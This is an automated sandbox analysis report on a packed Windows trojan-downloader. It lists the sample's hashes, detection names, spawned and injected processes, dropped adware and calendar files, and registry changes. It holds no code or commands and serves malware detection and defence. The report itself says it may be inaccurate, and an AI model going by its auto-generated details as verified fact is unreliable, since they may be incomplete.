HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.Agent.BDJT (B) (Emsisoft), Trojan.Agent.BDJT (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.Alureon.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 4937d0d8c199fab565657944560f67d1
SHA1: 5737a160ebc28f0bf83d2c4fa4accc59893a551c
SHA256: af3654e6a7ce82418e14b8d42487da9c09329eca7c5cf022bbcfa1e89f7967fb
SSDeep: 12288:M8cXSrqphitkdebZlqe8a 4pQGZjLfPtaXQsFhKF:M8cXSMit1bCQrjTlaA
Size: 494592 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-07 06:12:39
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
Wuji.exe:568
FhCalendar.exe:452
wujiime.exe:464
MSIB.tmp:916
xxdd_165.exe:452
updroots.exe:1016
114gglm_016.exe:488
Update.exe:444
fhrl_6_12001.exe:320
fhsli_6_12001.exe:1852
netsh.exe:436
netsh.exe:628
SportLive.exe:908
MsiExec.exe:1760
oemfhsli.exe:628
The Trojan injects its code into the following process(es):
FhCalendar.exe:588
%original file name%.exe:1832
File activity
The process FhCalendar.exe:588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\fixad[1].htm (1737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetHoliday[1].ashx (876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\SendClickData[1].ashx (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].css (584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\sogou_icon_short[1].png (1421 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\qi[1].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].js (908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[1].js (376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\82ea18df-b4ae-4b17-b1ab-46cba4b98343[1].jpg (19946 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAH4OJPH.htm (2844 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (1403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (330 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\pixel[1].htm (6 bytes)
%Program Files%\fhrl\note.ini (991 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\CAQJWRVK.htm (1684 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\924aed3e-a026-4cc3-996e-72927d75dda5[1].jpg (7278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\jquery-1.3.2.min[1].js (36827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[1].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetWeather[1].ashx (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[2].js (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[2].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAKPO1SZ.htm (3738 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\48aaf3d6-f95f-4921-8a68-2606aed69a12[1].jpg (13306 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetWeather[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetHoliday[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\SendClickData[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)
The process wujiime.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Wuji\Wuji.exe (7209 bytes)
%Program Files%\Wuji\update.exe (7451 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\æ— æžÂ输入法\æ— æžÂ输入法.lnk (638 bytes)
%Program Files%\Wuji\Wuji.dat (1945 bytes)
%Program Files%\Wuji\uninst.exe (3685 bytes)
%Documents and Settings%\%current user%\Desktop\æ— æžÂ输入法.lnk (626 bytes)
%Program Files%\Wuji\Wuji.dll (2422 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\æ— æžÂ输入法\å¸载无æžÂ输入法.lnk (479 bytes)
%System%\catsrvuz.dll (53 bytes)
%Program Files%\Wuji\Show.dat (5 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Desktop\æ— æžÂ输入法.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssD.tmp (0 bytes)
%Program Files%\Wuji\Wuji.dll (0 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\æ— æžÂ输入法\å¸载无æžÂ输入法.lnk (0 bytes)
The process xxdd_165.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\xxdd\Liveconfig.ini (22 bytes)
%Program Files%\xxdd\xxdd.msi (146581 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp (0 bytes)
The process 114gglm_016.exe:488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\wujiime.exe (2105 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsrC.tmp (0 bytes)
The process Update.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (72 bytes)
%Program Files%\fhrl\Update.log (402 bytes)
%Program Files%\fhrl\fhUp\Update\version.ini (72 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (0 bytes)
The process fhrl_6_12001.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\fhrl\Skin\test\btn_push.png (263 bytes)
%Program Files%\fhrl\Skin\test\clock_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\²Ëµ¥bk.png (1 bytes)
%Program Files%\fhrl\Skin\test\È·Èð´Å¥2̬.png (1 bytes)
%Program Files%\fhrl\Skin\test\Àö¯½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\closetip_hov.png (4 bytes)
%Program Files%\fhrl\Skin\test\xpopweb.xml (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xhlwnd.xml (2 bytes)
%Program Files%\fhrl\Skin\test\¹úÇì½Ú.png (508 bytes)
%Program Files%\fhrl\Skin\test\equal_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\city_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_hover.png (792 bytes)
%Program Files%\fhrl\Skin\test\finish_push.png (417 bytes)
%Program Files%\fhrl\Skin\test\mini_bk.png (14 bytes)
%Program Files%\fhrl\Skin\test\go_hov.png (2 bytes)
%Program Files%\fhrl\Fhuninstall.exe (9178 bytes)
%Program Files%\fhrl\Skin\test\½Ìʦ½Ú.png (545 bytes)
%Program Files%\fhrl\Skin\test\ca_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\Æßæ½Ú.png (930 bytes)
%Program Files%\fhrl\Skin\test\go_nor.png (2 bytes)
%Program Files%\fhrl\FMTest.exe (14713 bytes)
%Program Files%\fhrl\huangli.xml (6456 bytes)
%Program Files%\fhrl\Skin\test\finish_hov.png (413 bytes)
%Program Files%\fhrl\Skin\test\shop_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\closetip_push.png (4 bytes)
%Program Files%\fhrl\Skin\test\input.png (3 bytes)
%Program Files%\fhrl\Skin\test\back_push.png (2 bytes)
%Program Files%\fhrl\Update.exe (17508 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_down.png (279 bytes)
%Program Files%\fhrl\KillProc.exe (4255 bytes)
%Program Files%\fhrl\Skin\test\calendar.png (7 bytes)
%Program Files%\fhrl\Skin\test\day_hov.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_uninstall.png (1392 bytes)
%Program Files%\fhrl\Skin\test\setting_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\clocknote_list_item.xml (3 bytes)
%Program Files%\fhrl\Skin\test\¼Ù.png (1 bytes)
%Program Files%\fhrl\Skin\test\edit_nor.png (431 bytes)
%Program Files%\fhrl\Skin\test\button_B_hover.png (613 bytes)
%Program Files%\fhrl\Skin\test\clock_nor.png (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\፼ÃÂÈÕÀú\፼ÃÂÈÕÀú.lnk (686 bytes)
%Program Files%\fhrl\uninst.exe (738 bytes)
%Program Files%\fhrl\Skin\test\ÖÃÂÇï½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\shop_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\Combo_over.bmp (3 bytes)
%Program Files%\fhrl\Skin\test\xfhnotetip.xml (1 bytes)
%Program Files%\fhrl\FMDLL32.dll (14324 bytes)
%Program Files%\fhrl\Skin\test\look_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\menu.xml (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_process.png (3 bytes)
%Program Files%\fhrl\Skin\test\jia_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\Refresh_hover.png (1 bytes)
%Program Files%\fhrl\Skin\test\clock_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\tip_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\equal_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\³ýæ.png (1 bytes)
%Program Files%\fhrl\Skin\test\setting_hov.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_back.png (1 bytes)
%Program Files%\fhrl\Skin\warn.wav (314 bytes)
%Program Files%\fhrl\subdivis.db (4 bytes)
%Program Files%\fhrl\Skin\test\shop_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_show.png (3 bytes)
%Program Files%\fhrl\Update\version.ini (72 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_normal.png (1578 bytes)
%Program Files%\fhrl\Skin\test\xminiweb.xml (2 bytes)
%Program Files%\fhrl\Skin\test\js_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\clock_del_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\look_nor.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\index_1.png (2 bytes)
%Program Files%\fhrl\Skin\Default\foembin.exe (12158 bytes)
%Program Files%\fhrl\Skin\test\button_normal.png (676 bytes)
%Program Files%\fhrl\Skin\test\xiala_1.png (1 bytes)
%Program Files%\fhrl\Skin\test\Ãâ€Ã‚ªÂµÂ©.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_hot.png (1228 bytes)
%Program Files%\fhrl\FhCalendar.exe (19232 bytes)
%Program Files%\fhrl\Skin\Default\Skin.ini (1 bytes)
%Program Files%\fhrl\Skin\test\Ê¥µ®½Ú.png (873 bytes)
%Program Files%\fhrl\Skin\test\js_sel.png (1 bytes)
%Program Files%\fhrl\Skin\test\index.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_close_highlight.png (475 bytes)
%Program Files%\fhrl\Skin\test\ca_nor.png (2 bytes)
%Program Files%\fhrl\Skin\Default\unist_btn_next.png (1350 bytes)
%Program Files%\fhrl\Skin\test\¸Ã¶÷½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\¹Ã½Ú.png (913 bytes)
%Program Files%\fhrl\Skin\test\¼ÙÑ¡ÖÃÂ.PNG (3 bytes)
%Program Files%\fhrl\Skin\test\xbasicsetting.xml (4 bytes)
%Program Files%\fhrl\Skin\test\tip.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_hov.png (1 bytes)
%Program Files%\fhrl\FMDLL.dll (14673 bytes)
%Program Files%\fhrl\Skin\test\close_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xiala_3.png (1 bytes)
%Program Files%\fhrl\DuiLib_u.dll (10572 bytes)
%Program Files%\fhrl\Skin\test\day_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xfh.xml (1568 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\፼ÃÂÈÕÀú.lnk (692 bytes)
%Program Files%\fhrl\Skin\test\scrollbar.bmp (1568 bytes)
%Program Files%\fhrl\Skin\test\´º½Ú.png (1 bytes)
%Documents and Settings%\All Users\Desktop\፼ÃÂÈÕÀú.lnk (674 bytes)
%Program Files%\fhrl\Skin\test\dian.png (290 bytes)
%Program Files%\fhrl\Skin\test\clock_del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\back_nor.png (2 bytes)
%Program Files%\fhrl\Skin\test\S_22.png (1 bytes)
%Program Files%\fhrl\Skin\test\ÖØÑô½Ú.png (2 bytes)
%Program Files%\fhrl\Skin\Default\Controls.ini (285 bytes)
%Program Files%\fhrl\Skin\Default\bin.ini (1 bytes)
%Program Files%\fhrl\Skin\test\¶ËÎç½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\delapp1.png (1 bytes)
%Program Files%\fhrl\Skin\test\close_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\new_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\logo.png (4 bytes)
%Program Files%\fhrl\Skin\test\Festival.xml (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_pic_top.png (1568 bytes)
%Program Files%\fhrl\Skin\test\back_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\ÇåÃ÷½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\js_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\equal_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\¸¾Å®½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\¸¸Ç×½Ú.png (846 bytes)
%Program Files%\fhrl\Skin\test\edit_push.png (432 bytes)
%Program Files%\fhrl\Skin\test\¶ùï½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_down.png (784 bytes)
%Program Files%\fhrl\Skin\test\delapp.png (3 bytes)
%Program Files%\fhrl\Skin\test\clock_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_close_normal.png (1682 bytes)
%Program Files%\fhrl\Skin\test\ÓÞÈ˽Ú.png (991 bytes)
%Program Files%\fhrl\Skin\test\go_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\lunar.png (2 bytes)
%Program Files%\fhrl\Skin\test\°àÑ¡ÖÃÂ.PNG (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\፼ÃÂÈÕÀú.lnk (686 bytes)
%Program Files%\fhrl\Skin\test\new_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\day_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\js_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\logo_16icon.png (3 bytes)
%Program Files%\fhrl\Skin\test\bg10.png (1568 bytes)
%Program Files%\fhrl\Skin\test\ĬÈÃÂ.png (1 bytes)
%Program Files%\fhrl\Skin\test\tip_content_bk.png (3 bytes)
%Program Files%\fhrl\Skin\Default\line.png (2 bytes)
%Program Files%\fhrl\Skin\test\scrollbar.png (1 bytes)
%Program Files%\fhrl\Skin\test\shop_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\city_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_B_pushed.png (605 bytes)
%Program Files%\fhrl\Skin\test\logo_mini.png (1 bytes)
%Program Files%\fhrl\Skin\test\app_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\menu_bk.png (3 bytes)
%Program Files%\fhrl\Skin\test\jia_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\Ãâ€Ã‚ªÃÂü½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\scrollbar_o.png (1975 bytes)
%Program Files%\fhrl\Skin\test\jsq_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\ƽ°²Ò¹.png (1 bytes)
%Program Files%\fhrl\Skin\test\finish_nor.png (425 bytes)
%Program Files%\fhrl\Skin\test\ca_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_res.png (3 bytes)
%Program Files%\fhrl\Skin\test\ĬÈÃÂÑ¡ÖÃÂ.png (2 bytes)
%Program Files%\fhrl\Skin\test\jintian3.png (3 bytes)
%Program Files%\fhrl\Skin\test\layerClo.png (1 bytes)
%Program Files%\fhrl\Skin\Default\btn_radio.png (1 bytes)
%Program Files%\fhrl\Skin\test\È·Èð´Å¥³£Ì¬.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_B_normal.png (474 bytes)
%Program Files%\fhrl\Skin\test\setting_push.png (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\፼ÃÂÈÕÀú\öÃâ€ÃƒËœÃ‚·Ã§ÂºÃÂÈÕÀú.lnk (691 bytes)
%Program Files%\fhrl\Skin\test\clock_del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\chat_mid_bk.png (1308 bytes)
%Program Files%\fhrl\Skin\test\closetip_nor.png (4 bytes)
%Program Files%\fhrl\Skin\test\clock_note_setting.xml (8 bytes)
%Program Files%\fhrl\Skin\test\Refresh_pushed.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_cancel.png (890 bytes)
%Program Files%\fhrl\Skin\test\ĸÇ×½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\S_11.png (1 bytes)
%Program Files%\fhrl\Skin\test\look_hov.png (2 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_close.png (2 bytes)
%Program Files%\fhrl\Skin\test\bord_bk.png (3 bytes)
%Program Files%\fhrl\Skin\test\Combo_nor.bmp (3 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_highlight.png (1440 bytes)
%Program Files%\fhrl\Skin\test\btn_close_down.png (1098 bytes)
%Program Files%\fhrl\Skin\test\°à.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\close_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\ÇéÈ˽Ú.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_check.png (3 bytes)
%Program Files%\fhrl\Skin\test\edit_hov.png (429 bytes)
%Program Files%\fhrl\Skin\test\clock_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\¹â¹÷½Ú.png (536 bytes)
%Program Files%\fhrl\Skin\test\Refresh_normal.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\xiala_2.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\jia_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\ca_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\new_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\weather_bk.png (15 bytes)
%Program Files%\fhrl\Skin\test\friend_list_item.xml (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp (0 bytes)
The process fhsli_6_12001.exe:1852 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (10 bytes)
%Program Files%\Common Files\Install\fhrlsli\info.ini (996 bytes)
%Program Files%\Common Files\Install\fhrlsli\oemfhsli.exe (17882 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (0 bytes)
The process SportLive.exe:908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\lb[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\iau[1].htm (1 bytes)
%Program Files%\xxss.ini (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\core[1].php (800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\z_stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\ad_sport[1].jpg (12251 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (163 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\addetail[1].html (308 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\ad[1].htm (519 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
%Program Files%\TogouInputin\Togoupplib.dat (2095 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\jquery-1.9.1.min[1].js (55677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\type[1].js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\event[1].css (554 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\addetail[1].htm (413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\center-titlebg[1].png (948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\event[1].htm (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\common[1].js (73 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sport.yuejan[1].txt (214 bytes)
The process %original file name%.exe:1832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\fhsli_6_12001.exe (1616 bytes)
C:\114gglm_016.exe (1664 bytes)
C:\xxdd_165.exe (30622 bytes)
The process oemfhsli.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (330 bytes)
%Documents and Settings%\All Users\Documents\fhrl_6_12001.exe (13084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (997 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (38 bytes)
%Program Files%\Common Files\Install\fhrlsli\info.ini (997 bytes)
%Program Files%\fhrl\info.db (120 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (0 bytes)
Registry activity
The process Wuji.exe:568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKCU\Software\VB and VBA Program Settings\fzl\2013]
"zc1" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKCU\Software\VB and VBA Program Settings\fzl\2013]
"zc4" = "1"
"zc5" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
